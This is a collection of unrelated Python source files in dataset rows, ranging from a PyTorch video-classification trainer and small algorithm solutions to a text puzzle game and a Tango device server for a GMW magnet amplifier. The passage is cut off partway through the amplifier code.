i1=sorted(i)
print(i1) |
21,536 | 3be2c6b631942f0f7123c69ce38e23a79125c9f9 | # import datasize
BYTE = 1
KILOBYTE = BYTE * 1024
MEGABYTE = KILOBYTE * 1024
GIGABYTE = MEGABYTE * 1024
TERABYTE = GIGABYTE * 1024
|
21,537 | 0f10041e9f781ddc0dcf2c31fc815efc9b481529 | import torch
from torch import nn
from torch.autograd import Variable
import time
import os
from validation import val_epoch
from model import generate_model
from opts import parse_opts
from utils import AverageMeter, accuracy, adjust_learning_rate, save_checkpoint
from dataset import Video
from spatial_transforms import (Compose, Normalize, Scale,
CenterCrop, CornerCrop, MultiScaleCornerCrop,
MultiScaleRandomCrop, RandomHorizontalFlip, ToTensor)
from temporal_transforms import TemporalRandomCrop, LoopPadding
import numpy as np
from torch.optim import lr_scheduler
from mean import get_mean
from collections import defaultdict
best_prec1 = 0
def train_epoch(epoch, data_loader, model, criterion, optimizer, opt):
print('train at epoch {} with lr {}'.format(epoch, optimizer.param_groups[-1]['lr']))
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
end_time = time.time()
for i, (inputs, targets, _) in enumerate(data_loader):
data_time.update(time.time() - end_time)
if not opt.no_cuda:
targets = targets.cuda(async=True)
inputs = Variable(inputs)
targets_var = Variable(targets)
outputs = model(inputs)
loss = criterion(outputs, targets_var)
prec1, prec5 = accuracy(outputs.data, targets, topk=(1, 5))
losses.update(loss.data[0], inputs.size(0))
top1.update(prec1[0], inputs.size(0))
top5.update(prec5[0], inputs.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_time.update(time.time() - end_time)
end_time = time.time()
if i % opt.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i + 1, len(data_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=top1, top5=top5))
def validate(val_loader, model, criterion):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
model.eval()
end = time.time()
for i, (input, target, _) in enumerate(val_loader):
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
output = model(input_var)
loss = criterion(output, target_var)
prec1, prec5 = accuracy(output.data, target, topk=(1,5))
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
batch_time.update(time.time() - end)
end = time.time()
if i % opt.print_freq == 0:
print(('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5)))
print(('Testing Results: Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} Loss {loss.avg:.5f}'
.format(top1=top1, top5=top5, loss=losses)))
return losses.avg, top1.avg
if __name__ == '__main__':
opt = parse_opts()
opt.mean = get_mean(1)
opt.arch = '{}-{}'.format(opt.model_name, opt.model_depth)
opt.sample_duration = 16
opt.scales = [opt.initial_scale]
for i in range(1, opt.n_scales):
opt.scales.append(opt.scales[-1] * opt.scale_step)
print('#####', opt.scales)
print(opt.mean)
spatial_transform = Compose([MultiScaleCornerCrop(opt.scales, opt.sample_size),
RandomHorizontalFlip(),
ToTensor(1),
Normalize(opt.mean, [1, 1, 1])])
temporal_transform = TemporalRandomCrop(opt.sample_duration)
train_data = Video(opt.train_list, spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
sample_duration=opt.sample_duration, n_samples_for_each_video=1)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.n_threads, pin_memory=True)
val_spatial_transform = Compose([Scale(opt.sample_size),
CenterCrop(opt.sample_size),
ToTensor(1),
Normalize(opt.mean, [1, 1, 1])])
val_temporal_transform = LoopPadding(opt.sample_duration)
val_data = Video(opt.val_list, spatial_transform=val_spatial_transform,
temporal_transform=val_temporal_transform,
sample_duration=opt.sample_duration, n_samples_for_each_video=opt.n_val_samples)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=opt.batch_size, shuffle=False, num_workers=opt.n_threads, pin_memory=True)
model, policies = generate_model(opt)
model = nn.DataParallel(model, device_ids=opt.gpus).cuda()
if opt.finetune:
if os.path.isfile(opt.finetune):
print('finetuning from model {}'.format(opt.finetune))
model_data = torch.load(opt.finetune)
own_state = model.state_dict()
for k, v in model_data['state_dict'].items():
if 'fc' in k:
continue
print(k)
if isinstance(v, torch.nn.parameter.Parameter):
v = v.data
assert v.dim() == own_state[k].dim(), '{} {} vs {}'.format(k, v.dim(), own_state[k].dim())
own_state[k].copy_(v)
else:
assert False, ("=> no checkpoint found at '{}'".format(opt.finetune))
if opt.resume:
if os.path.isfile(opt.resume):
print('loading model {}'.format(opt.resume))
model_data = torch.load(opt.resume)
opt.start_epoch = model_data['epoch']
best_prec1 = model_data['best_prec1']
model.load_state_dict(model_data['state_dict'])
else:
assert False,("=> no checkpoint found at '{}'".format(opt.resume))
criterion = torch.nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(policies, opt.lr, momentum=opt.momentum, dampening=opt.dampening,
weight_decay=opt.weight_decay, nesterov=opt.nesterov)
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min', patience=opt.lr_patience)
for epoch in range(opt.start_epoch, opt.epochs):
#adjust_learning_rate(optimizer, epoch, opt.lr_steps, opt)
train_epoch(epoch, train_loader, model, criterion, optimizer, opt)
if (epoch + 1) % opt.eval_freq == 0 or epoch == opt.epochs - 1:
loss, prec1 = validate(val_loader, model, criterion)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
save_checkpoint({
'epoch': epoch + 1,
'arch': opt.arch,
'state_dict': model.state_dict(),
'optimizer' : optimizer.state_dict(),
'best_prec1': best_prec1,
}, is_best, opt.snapshot_pref)
print('best_prec1: ', best_prec1)
scheduler.step(loss)
|
21,538 | a449b2bf7108076727a671217c0e1245cb9acbb0 | # 수도요금
# https://www.acmicpc.net/problem/10707
# https://github.com/yhs3434/Algorithms
a = int(input())
b = int(input())
c = int(input())
d = int(input())
p = int(input())
x = p*a
y = b
if p - c > 0:
y += d * (p - c)
print(min(x,y)) |
21,539 | 2d01be5bb369206521705ec53cd0b87c44b30a98 | import numpy as np
from .policy import Policy
from Models.model import Model
class ValueIteration(Policy):
def __init__(self, model):
super().__init__()
self.model = model
self.states = model.get_all_states()
self.V = dict()
for s in self.states:
self.V[s] = 0
#hardcodeado
#borro el ultimo estado porque genera problemas al no tener acciones posibles
self.states.remove('fin_robo')
self.policy = self.value_iteration(0.001, 0.99, self.V)
def action(self, actions, state):
return self.policy[state]
def Q(self, state, action, V, gamma=0.99):
#states_prob_rewards type: [(state, probability, reward)]
states_prob_rewards = self.model.posible_states(state, action)
return np.sum([self.Q_help(state, action, s_p_r, V, gamma) for s_p_r in states_prob_rewards])
def Q_help(self, state, action, state_probability_reward, V, gamma):
T = state_probability_reward[1]
next_s = state_probability_reward[0]
R = state_probability_reward[2]
return T * (R + gamma * V[next_s])
def value_iteration(self, theta, gamma, V):
done = False
policy = dict()
while not done:
delta = 0
for s in self.states:
old = V[s]
actions = self.model.posible_actions(s)
all_Qs = [self.Q(s, a , V) for a in actions]
V[s] = np.max(all_Qs)
policy[s] = actions[np.argmax(all_Qs)]
delta = max(delta, abs(old - V[s]))
done = delta < theta
return policy
|
21,540 | e2608f5b6fb2af94cce6ad33b0390da391bab8e3 | """
Mini puzzle - Kagynt
lexical number succession
"""
def numSuccession ():
tried = 0
lWall = "1:~, 4:4, 2:~, 7:5, 5:4"
rWall = "3:5, 6:3, 10:3, 12:6, 20:6"
Wall = "8:_, 11:_, 90:_"
answer= ["5", "6", "6"]
query = ["0","0","0"]
win = False
lock = False
print('''You find yourself in a room with no doors or windows\n and what it seems to be letters on the walls''')
while not win:
deci = input("What would you like to do?\nA: Walk to the left wall.\nB: Walk to the right wall.\nC: Walk to the front wall.\nD: Walk to the back wall.\n")
while deci not in ("A", "B", "C", "D", "a", "b", "c", "d"):
deci = input("Invalid command. Please choose again... \n")
#Making my way to the Left
if deci in ("A","a"):
print("You see a pretty damaged writing in the wall")
print("You manage to read some numbers along the broken (~) pieces of wall")
print(lWall)
deci = input("Press B to go back\n")
while deci not in ("B", "b"):
deci = input("Invalid command. Please choose again... \n")
print("You're back at the center of the room")
#Making my way to the Right
elif deci in ("B", "b"):
print("You see a very well conserved wall")
print("It seems as if it was part of an archaeological collection.\nThere are some numbers written in it")
print(rWall)
deci = input("Press B to go back\n")
while deci not in ("B", "b"):
deci = input("Invalid command. Please choose again... \n")
print("You're back at the center of the room")
#Now you're looking at the Front
elif deci in ("C", "c"):
print("There lies a very ominous-looking gate in front of you, with no apparent handle\nand it seems like not even a hundred men could break it open")
#Second+ Try
if Wall != "8:_, 11:_, 90:_":
deci =input("What would you like to do?\nA: Change the rings.\nB: Push the door\nC: Go back.\n")
else:
deci =input("What would you like to do?\nA:Inspect closer.\nB: Push the door\nC: Go back.\n")
while deci not in ("A", "a","B","b","C","c"):
deci = input("Invalid command. Please choose again... \n")
if deci in ("A","a"):
if tried == 0:
print("You find three very small stone rings with numbers engraved on them,\n every single one is below a big faint number on the wall(8, 11 and 90)")
print('''Next to the rings, there's a very faint writing on the wall, you squint your eyes and read it....\n"He who attempts to defile the vault, must first overcome the trial of the observant" '''+Wall+'''\nHmmm... perhaps it has something to do with the ring's number?''')
if not lock:
Wall = "8:_, 11:_, 90:_"
print(Wall)
query[0] = input("So what would you like to set the first ring to? (0-9)\n")
while query[0] not in ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"):
query[0] = input("Invalid command. Please choose again... \n")
Wall = Wall.replace("_", query[0], 1)
print(Wall)
query[1] = input("What about the second one? (0-9)\n")
while query[1] not in ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"):
query[1] = input("Invalid command. Please choose again... \n")
Wall = Wall.replace("_", query[1], 1)
print(Wall)
query[2] = input("And the third one? (0-9)\n")
while query[2] not in ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"):
query[2] = input("Invalid command. Please choose again... \n")
Wall = Wall.replace("_", query[2], 1)
print(Wall)
if query == answer:
print("You hear a quiet click and the rings lock in place")
lock = True
else:
print("Nothing seems to happen")
deci = input("Press B to go back\n")
while deci not in ("B", "b"):
deci = input("Invalid command. Please choose again... \n")
else:
print("They're locked")
deci = input("Press B to go back\n")
while deci not in ("B", "b"):
deci = input("Invalid command. Please choose again... \n")
tried = 1
elif deci in ("B", "b"):
if lock:
print("The door opens wide almost effortlessly. Congratulations!!")
win = True
else:
print("It won't move")
deci = input("Press B to go back\n")
while deci not in ("B", "b"):
deci = input("Invalid command. Please choose again... \n")
if not win:
print("You're back at the center of the room")
#This is the back door
elif deci in ("D","d"):
print("You find a writing on the floor, it doesn't look like it is part of the initial design of the tomb")
print('''It says:"Psst psst! Count the first ones!!!"....the first what?''')
deci = input("Press B to go back\n")
while deci not in ("B", "b"):
deci = input("Invalid command. Please choose again... \n")
print("You're back at the center of the room")
#
def ringMove(z1, z2):
opp = {"left":"right", "right":"left"}
moves = 0
side = ""
moves = z2 - z1
if moves == 0:
return("You let the ring be.")
elif moves == 5 or moves == -5:
return ("You move the ring 5 ticks.")
elif moves > 5 or moves < -5:
side = "left"
if moves < 0:
moves *=-1
side = opp[side]
moves = 10 - moves
elif moves < 5 and moves > -5:
side = "right"
if moves < 0:
moves*=-1
side = opp[side]
return ("You move the ring "+str(moves)+" ticks to the "+side+".")
numSuccession()
#print(ringMove(0, 5))
|
21,541 | bfbab49494557f87922c974e869d4d2c4cf255ee | def solution(n, l, r):
reserve = set(r) - set(l)
lost = set(l) - set(r)
answer = n - len(reserve) - len(lost) # init
for v in reserve:
if v - 1 in lost:
answer += 2
lost.remove(v - 1)
elif v + 1 in lost:
answer += 2
lost.remove(v + 1)
else:
answer += 1
return answer |
21,542 | 8c9ebad067c88ec1986af1317b2b55e9f9eed10d | import registry
import settings
import random
from objects.bullets.grenade_launcher_bullet import GrenadeLauncherBullet
from objects.weapons.base import WeaponBase
from kaa.geometry import Vector
class GrenadeLauncher(WeaponBase):
def __init__(self):
# node's properties
super().__init__(sprite=registry.global_controllers.assets_controller.grenade_launcher_img)
def shoot_bullet(self):
bullet_position = self.get_initial_bullet_position()
bullet_velocity = Vector.from_angle_degrees(
self.parent.rotation_degrees) * settings.GRENADE_LAUNCHER_BULLET_SPEED
self.scene.space.add_child(GrenadeLauncherBullet(position=bullet_position, velocity=bullet_velocity))
# reset cooldown time
self.cooldown_time_remaining = self.get_cooldown_time()
# play shooting sound
registry.global_controllers.assets_controller.grenade_launcher_shot_sound.play()
def get_cooldown_time(self):
return 1.000
|
21,543 | ba8ce3e25e012b9ab77c7d46bf7c285b216f8a10 | # -*- coding: utf-8 -*-
# Filename lxml_requests.py
# Author Lasse Vang Gravesen <gravesenlasse@gmail.com>
# First edited 28-08-2012 01:30
# Last edited 28-08-2012 03:38
import lxml.html, lxml.etree
import requests
# HTML
def html(url):
return lxml.html.fromstring(requests.get(url).text)
def html_tostring(html):
return lxml.html.tostring(html, pretty_print=True)
def html_fromstring(s):
return lxml.html.fromstring(s)
# XML
def xml(url):
return lxml.etree.fromstring(requests.get(url).text)
def xml_tostring(xml):
return lxml.etree.tostring(xml, pretty_print=True)
def xml_fromstring(s):
return lxml.etree.fromstring(s)
requests.html = html
requests.html_tostring = html_tostring
requests.html_fromstring = html_fromstring
requests.xml = xml
requests.xml_tostring = xml_tostring
requests.xml_fromstring = xml_fromstring
requests.lxml = lxml
requests.lxml.html = lxml.html
requests.lxml.etree = lxml.etree
|
21,544 | 5ea888d03aa76798477748bccbbed5b9e7330c75 | import time
from contextlib import contextmanager
class Clock:
def __init__(self):
self.start = time.time()
self._elapsed = None
@property
def elapsed(self):
if self._elapsed is None:
self.stop()
return self._elapsed
def stop(self):
self._elapsed = time.time() - self.start
@contextmanager
def timer():
c = Clock()
yield c
c.stop()
|
21,545 | a7267da64033248ffb606925d4826dfe0ee49845 | fname = input('Enter a file name: ')
try:
fopen = open(fname)
except FileNotFoundError:
print('file not found!')
exit()
count = dict()
for line in fopen:
line = line.rstrip()
words = line.split()
for word in words:
if len(words) == 0 or words[0] != 'From':
continue
delimiter = ':'
h = words[5].split(delimiter)
if h[0] not in count:
count[h[0]] = 1
else:
count[h[0]] += 1
print(count)
lst = list()
for key, val in list(count.items()):
lst.append((key, val))
lst.sort()
for key, val in lst:
print(key,val) |
21,546 | e5e648c3922198ce66f5ec43c4fc5e679931450b | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# ############################################################################
# license :
# ============================================================================
#
# File : GMW.py
#
# Project : GMW
#
# This file is part of Tango device class.
#
# Tango is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Tango is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Tango. If not, see <http://www.gnu.org/licenses/>.
#
#
# $Author : sci.comp$
#
# $Revision : $
#
# $Date : $
#
# $HeadUrl : $
# ============================================================================
# This file is generated by POGO
# (Program Obviously used to Generate tango Object)
# ############################################################################
__all__ = ["GMW", "GMWClass", "main"]
__docformat__ = 'restructuredtext'
import PyTango
import sys
# Add additional import
#----- PROTECTED REGION ID(GMW.additionnal_import) ENABLED START -----#
import socket
import select
import traceback
import numpy as np
#----- PROTECTED REGION END -----# // GMW.additionnal_import
# Device States Description
# INIT : The Device goes into this State during initialization..
# ON : The Device is in this State when the PicoFLEX is switched on and in normal \noperation.
# OFF : The Device is in this State when the PicoFlex is switched OFF.
# FAULT : The tangoDevice enters this state when there is an erro, e.g. a communication error.
class GMW (PyTango.Device_4Impl):
"""This Tango Device Class is used to set and readout
the GMW 231HC model current amplifier."""
# -------- Add you global variables here --------------------------
#----- PROTECTED REGION ID(GMW.global_variables) ENABLED START -----#
# Measured values to be used for the interpolation to set and read out the magnetic field
current_monitor = [-7.0074,-6.6513,-6.3081,-5.9527,-5.5980,-5.2580,-4.9136,-4.5479,-4.2073,-3.8577,-3.4971,-3.1501,-2.7969,-2.4454,-2.1084,-1.7436,-1.3934,-1.0512,-0.7035,-0.3513,0.0010,0.3513,0.7035,1.0512,1.3934,1.7436,2.1084,2.4454,2.7969,3.1501,3.4971,3.8577,4.2073,4.5479,4.9136,5.2580,5.5980,5.9527,6.3081,6.6513,7.0074]
voltage_monitor = [-2.1380,-2.0597,-1.9292,-1.8335,-1.7233,-1.5989,-1.5029,-1.3802,-1.3012,-1.1778,-1.0840,-0.9784,-0.8649,-0.7628,-0.6584,-0.5434,-0.4406,-0.3339,-0.2166,-0.1058,0.0088,0.1058,0.2166,0.3339,0.4406,0.5434,0.6584,0.7628,0.8649,0.9784,1.0840,1.1778,1.3012,1.3802,1.5029,1.5989,1.7233,1.8335,1.9292,2.0597,2.1380]
magnetic_field = [-17.40,-17.35,-17.10,-17.00,-16.82,-16.6,-16.38,-16.12,-15.93,-15.46,-14.9,-14.4,-13.6,-12.49,-11.02,-9.29,-7.477,-5.64,-3.78,-1.90,0,1.90,3.78,5.64,7.477,9.29,11.02,12.49,13.6,14.4,14.9,15.46,15.93,16.12,16.38,16.6,16.82,17.00,17.10,17.35,17.40]
v_output = [-10,-9.5,-9,-8.5,-8,-7.5,-7,-6.5,-6,-5.5,-5,-4.5,-4,-3.5,-3,-2.5,-2,-1.5,-1,-0.5,0,0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10]
#----- PROTECTED REGION END -----# // GMW.global_variables
def __init__(self, cl, name):
PyTango.Device_4Impl.__init__(self,cl,name)
self.debug_stream("In __init__()")
GMW.init_device(self)
#----- PROTECTED REGION ID(GMW.__init__) ENABLED START -----#
#----- PROTECTED REGION END -----# // GMW.__init__
def delete_device(self):
self.debug_stream("In delete_device()")
#----- PROTECTED REGION ID(GMW.delete_device) ENABLED START -----#
#----- PROTECTED REGION END -----# // GMW.delete_device
def init_device(self):
self.debug_stream("In init_device()")
self.get_device_properties(self.get_device_class())
self.attr_magnetField_read = 0.0
self.attr_currentMonitor_read = 0.0
self.attr_voltageMonitor_read = 0.0
self.attr_fieldMonitorPlus_read = 0.0
self.attr_fieldMonitorMinus_read = 0.0
self.attr_amplifierPower_read = False
self.attr_normal_read = False
self.attr_inhibit_read = False
self.attr_moduleFault_read = False
self.attr_dcFault_read = False
self.attr_overCurrent_read = False
self.attr_overTemperature_read = False
self.attr_interlockStatus_read = False
self.attr_magnetField_target_read = 0.0
#----- PROTECTED REGION ID(GMW.init_device) ENABLED START -----#
self.set_state(PyTango.DevState.INIT)
self.set_status("Initialising Tango Device...")
self.debug_stream("Initialising Tango Device...")
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket_connect()
#----- PROTECTED REGION END -----# // GMW.init_device
def always_executed_hook(self):
self.debug_stream("In always_excuted_hook()")
#----- PROTECTED REGION ID(GMW.always_executed_hook) ENABLED START -----#
#----- PROTECTED REGION END -----# // GMW.always_executed_hook
# -------------------------------------------------------------------------
# GMW read/write attribute methods
# -------------------------------------------------------------------------
def read_magnetField(self, attr):
self.debug_stream("In read_magnetField()")
#----- PROTECTED REGION ID(GMW.magnetField_read) ENABLED START -----#
# We have to calculate the magnetic field from the voltage_monitor
voltage = self.read_voltage()
self.debug_stream("Volt monitor = " + str(voltage))
self.debug_stream("Converting " + str(voltage) + " Volts in Magnetic Field...")
newMagField = np.interp(voltage,
self.voltage_monitor,
self.magnetic_field)
self.debug_stream("Magnetic Field = " + str(newMagField) + " kGauss")
self.attr_magnetField_read = newMagField
attr.set_value(self.attr_magnetField_read)
#----- PROTECTED REGION END -----# // GMW.magnetField_read
def write_magnetField(self, attr):
self.debug_stream("In write_magnetField()")
data = attr.get_write_value()
#----- PROTECTED REGION ID(GMW.magnetField_write) ENABLED START -----#
self.set_status("Reading/writing data")
self.debug_stream("Converting %d kGauss in Volts...", data )
self.attr_magnetField_target = data
volt = np.interp(data, self.magnetic_field, self.v_output)
cmd_str="set_voltage " + str(volt)
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
if resp.rstrip("\r\n") == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','write_magnetField()')
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.magnetField_write
def read_currentMonitor(self, attr):
self.debug_stream("In read_currentMonitor()")
#----- PROTECTED REGION ID(GMW.currentMonitor_read) ENABLED START -----#
self.set_status("Reading/writing data")
cmd_str="read_current"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if sresp == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_currentMonitor()')
else:
try:
self.attr_currentMonitor_read = float("{0:.3f}".format(float(sresp)))
attr.set_value(self.attr_currentMonitor_read)
except ValueError:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect replay! Expected a float, received " +sresp )
self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.currentMonitor_read
def read_voltageMonitor(self, attr):
self.debug_stream("In read_voltageMonitor()")
#----- PROTECTED REGION ID(GMW.voltageMonitor_read) ENABLED START -----#
self.set_status("Reading/writing data")
cmd_str="read_voltage"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if sresp == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_voltageMonitor()')
else:
try:
self.attr_voltageMonitor_read = float("{0:.3f}".format(float(resp)))
attr.set_value(self.attr_voltageMonitor_read)
except ValueError:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect replay! Expected a float, received " +sresp )
self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.voltageMonitor_read
def read_fieldMonitorPlus(self, attr):
self.debug_stream("In read_fieldMonitorPlus()")
#----- PROTECTED REGION ID(GMW.fieldMonitorPlus_read) ENABLED START -----#
self.set_status("Reading/writing data")
cmd_str="read_field_plus"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if resp.rstrip("\r\n") == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_fieldMonitorPlus()')
else:
try:
self.attr_fieldMonitorPlus_read = float("{0:.3f}".format(float(sresp)))
attr.set_value(self.attr_fieldMonitorPlus_read)
except ValueError:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect replay! Expected a float, received " +sresp )
self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.fieldMonitorPlus_read
def read_fieldMonitorMinus(self, attr):
self.debug_stream("In read_fieldMonitorMinus()")
#----- PROTECTED REGION ID(GMW.fieldMonitorMinus_read) ENABLED START -----#
self.set_status("Reading/writing data")
cmd_str="read_field_minus"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if resp.rstrip("\r\n") == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_fieldMonitorMinus()')
else:
try:
self.attr_fieldMonitorMinus_read = float("{0:.3f}".format(float(resp)))
attr.set_value(self.attr_fieldMonitorMinus_read)
except ValueError:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect replay! Expected a float, received " +sresp )
self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.fieldMonitorMinus_read
def read_amplifierPower(self, attr):
self.debug_stream("In read_amplifierPower()")
#----- PROTECTED REGION ID(GMW.amplifierPower_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_amplifier_power"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect raply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_amplifierPower()')
else:
self.attr_amplifierPower_read = eval(sresp)
attr.set_value(self.attr_amplifierPower_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.amplifierPower_read
def read_normal(self, attr):
self.debug_stream("In read_normal()")
#----- PROTECTED REGION ID(GMW.normal_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_normal"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect raply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_normal()')
else:
self.attr_normal_read = eval(sresp)
attr.set_value(self.attr_normal_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.normal_read
def read_inhibit(self, attr):
self.debug_stream("In read_inhibit()")
#----- PROTECTED REGION ID(GMW.inhibit_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_inhibit"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_inhibit()')
else:
self.attr_inhibit_read = eval(sresp)
attr.set_value(self.attr_inhibit_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.inhibit_read
def read_moduleFault(self, attr):
self.debug_stream("In read_moduleFault()")
#----- PROTECTED REGION ID(GMW.moduleFault_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_module_fault"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_moduleFault')
else:
self.attr_moduleFault_read = eval(sresp)
attr.set_value(self.attr_moduleFault_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.moduleFault_read
def read_dcFault(self, attr):
self.debug_stream("In read_dcFault()")
#----- PROTECTED REGION ID(GMW.dcFault_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_dc_fault"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_dcFault()')
else:
self.attr_dcFault_read = eval(sresp)
attr.set_value(self.attr_dcFault_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.dcFault_read
def read_overCurrent(self, attr):
self.debug_stream("In read_overCurrent()")
#----- PROTECTED REGION ID(GMW.overCurrent_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_over_current"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
